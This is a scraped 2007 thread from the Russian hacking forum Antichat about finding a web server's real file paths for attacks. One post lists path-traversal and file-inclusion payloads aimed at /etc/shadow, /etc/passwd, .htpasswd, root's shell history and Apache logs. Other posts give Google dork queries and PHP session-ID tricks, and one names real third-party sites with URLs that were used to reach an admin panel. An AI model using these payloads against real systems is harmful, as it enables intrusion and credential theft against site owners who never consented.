Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
07.01.2007, 12:55
|
|
Постоянный
Регистрация: 15.08.2006
Сообщений: 404
Провел на форуме:
3811682
Репутация:
641
|
|
Добавлю...
3) Поиск директорий и файлов.
Очень хороший сканер, ищущий директории файлов это IntelliTamper .
Сам юзаю.
А вобще интересная статья +. |
|
|
07.01.2007, 18:51
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520
Репутация:
2996
|
|
2D=P=CH= MOD=
Полное гавно так как ищет линкованные страницы и все это еще и грузит на комп море трафика и 0 пользы учитывая что все эти ссылки ты можешь найти сам.
Если хочешь действительно хорошего результата использую свой спиок файлов и папок у меня например щас 34.000 записей, иногда подобный скан заменяет ls.
|
|
|
|
04.02.2007, 17:16
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520
Репутация:
2996
|
|
Обновленно.
8(new))Логический перебор.
Не знаю как правильно назвать этот способ, вообщем случай у нас будет такой есть локальный инклуд или load_file в sql, И нас необходимо узнать путь что бы прочесть тот или иной(способов взлома в такой ситуации много но остановимся именно на чтении файлов и поиске путя до www) Сначало подумает что нам может помочь вообще???
1) Утсновленная ОС
2)Сервер (http)
3)тип сервера (хостинг/vds/vps/отдельная станция)
4)Список юзеров (/etc/passwd)
5)Конфиги логи и все что мы сможем найти.
6)Кофе Сигареты и много терпения.
И так я рассмотрю OC *nix и сервер apache как самые частые.
ну начнем с определения oс в этом на поможет nmap или любой другой сканер можем так же воспользоваться telenet  . Определили стоит linux. Для начала прочтем /etc/passwd найдем своего юзера и посмотрим его домашний каталог. определяем какуюто страничку на сервере например site.com/index.htm теперь мы имеем подобную загадку /home/user/***/***/ ... /index.htm
теперь начинаем перебирать в таком стиле:
Код:
/home/user/www/index.htm
/home/user/html/index.htm
/home/user/site/www/index.htm
/home/user/sites/site.com/index.htm
Скажу что за 2 часа ручного перебора и разумеется богатого воображения можно перебрать практически все возможные варианты.
Код:
USER CONFS
/.bash_history
/.htpasswd
/.htaccess
/etc/.htpasswd
/etc/shadow
/root/.bash_history
HTTPD
/usr/local/apache/conf/httpd.conf
/usr/apache/conf/httpd.conf
/usr/local/httpd/conf/httpd.conf
/usr/local/http/conf/httpd.conf
/usr/http/conf/httpd.conf
/usr/httpd/conf/httpd.conf
В конфигах апача можно найти реальный путь и еще много чего интересного.
ищем логи
Код:
../../../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../../../var/log/httpd/error_log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../apache/logs/error.log
../../../../apache/logs/access.log
../../../../../apache/logs/error.log
../../../../../apache/logs/access.log
../../../../../../apache/logs/error.log
../../../../../../apache/logs/access.log
../../../../../../../apache/logs/error.log
../../../../../../../apache/logs/access.log
../../../../../../../../apache/logs/error.log
../../../../../../../../apache/logs/access.log
../../../logs/error.log
../../../logs/access.log
../../../../logs/error.log
../../../../logs/access.log
../../../../../logs/error.log
../../../../../logs/access.log
../../../../../../logs/error.log
../../../../../../logs/access.log
../../../../../../../logs/error.log
../../../../../../../logs/access.log
../../../../../../../../logs/error.log
../../../../../../../../logs/access.log
../../../../../../../../../../../../etc/httpd/logs/acces_log
../../../../../../../../../../../../etc/httpd/logs/acces.log
../../../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../../../var/log/access_log
../../../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../../../var/log/access_log
../../../../../../../../../../../../var/log/error_log
Поиск с ../../../ применять только при инклудах.
Пока все ждите обновлений.
|
|
|
|
22.08.2007, 08:37
|
|
Познающий
Регистрация: 04.01.2006
Сообщений: 55
Провел на форуме:
106810
Репутация:
10
|
|
Сообщение от [ cash ]
7)Поисковые системы.
Очень часто в поисковиках остаються те или иные баги... запечатленные на сайтах это может быть временный отказ бд или или отказ в открытие сессии.
Поиск осуществляем.
Будет полезно почитать весь листинг, но если он очень большой то юзаем примерно такие запросы тут все зависит от фантазии.
Код:
site:target.com Warning
site:target.com on line
site:target.com mysql_fetch_array()
Ну и так далее.
Респектище огромный!!! Помогло после долгих мучений найти полный путь! Google.ru rulez, автору +!
|
|
|
|
22.08.2007, 13:11
|
|
Познающий
Регистрация: 27.12.2006
Сообщений: 37
Провел на форуме:
1253202
Репутация:
133
|
|
Есче на ксакепе писали про раскрытие путей.
Можа параметр передать в переменную как массив, подставим в имени переменной [] квадратные скобочки
http://www.oclcpica.org/?id[]=2&ln=uk
Даж в админку так попал
http://www.woolsnz-college.com/admin/frameset.php3?post[]=1
Последний раз редактировалось f1rebl00d; 22.08.2007 в 13:26..
|
|
|
|
22.08.2007, 17:08
|
|
Участник форума
Регистрация: 09.08.2006
Сообщений: 157
Провел на форуме:
1583810
Репутация:
56
|
|
хорошая статья!!!
не посоветуете какой нибудь сканер cgi уязвимостей в котором можно постоянно обновлять базу?
|
|
|
|
23.08.2007, 09:25
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520
Репутация:
2996
|
|
2 Lancellot
Сканер acceess diver.
Базу надо самому дополнять.
Разберусь с машиной напишу дополнение к статье. |
|
|
|
23.08.2007, 14:04
|
|
Флудер
Регистрация: 27.12.2005
Сообщений: 2,372
Провел на форуме:
5339610
Репутация:
4360
|
|
Кстати вариант насчет ошибок - довольно часто прокатывает такое:
допустим скрипт использует php-сессии (session_start и аналогичное) и включен режим отображения ошибок. Тогда если подставить в идентификатор сессии (в куках или в url) символы не из алфавитноцифрового набора, например точку ".", то интерпретатор PHP выдаст ошибку о неправильных символах в идентификаторе сессии, с раскрытием пути.
|
|
|
|
23.08.2007, 14:12
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520
Репутация:
2996
|
|
Переменная называеться phpsid в оригинале. Достаточно подставить любой сивнол который не A-Z a-z 0-9
|
|
|
|
23.08.2007, 14:51
|
|
Познавший АНТИЧАТ
Регистрация: 02.05.2006
Сообщений: 1,191
Провел на форуме:
7364332
Репутация:
1276
|
|
А закрыть это можно просто написав
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
